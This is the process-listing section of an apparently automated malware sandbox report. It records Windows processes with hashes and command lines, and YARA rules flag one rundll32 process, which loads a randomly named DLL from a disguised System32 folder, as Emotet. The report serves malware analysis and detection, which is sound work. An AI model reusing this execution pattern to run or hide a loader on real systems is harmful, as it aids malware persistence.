                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:35:17
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:35:17
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616
                                                                                                            Imagebase:0x210000
                                                                                                            File size:434592 bytes
                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:35:19
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 308
                                                                                                            Imagebase:0x210000
                                                                                                            File size:434592 bytes
                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:35:27
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2616 -ip 2616
                                                                                                            Imagebase:0x210000
                                                                                                            File size:434592 bytes
                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:35:29
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 316
                                                                                                            Imagebase:0x210000
                                                                                                            File size:434592 bytes
                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:35:42
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:36:03
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qfdohhzjskeoxat\kmkxxcep.fzg",Control_RunDLL
                                                                                                            Imagebase:0x850000
                                                                                                            File size:61952 bytes
                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000019.00000002.762912607.0000000002960000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000019.00000002.762912607.0000000002960000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000019.00000003.697774412.0000000002B7B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000019.00000003.697774412.0000000002B7B000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                            General

                                                                                                            Start time:09:36:03
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                            Imagebase:0x7ff6ac550000
                                                                                                            File size:455656 bytes
                                                                                                            MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:36:04
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                                            File size:625664 bytes
                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:36:13
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:36:37
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:37:05
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            General

                                                                                                            Start time:09:37:09
                                                                                                            Start date:02/12/2021
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                            Imagebase:0x7ff797770000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language

                                                                                                            Disassembly

                                                                                                            Code Analysis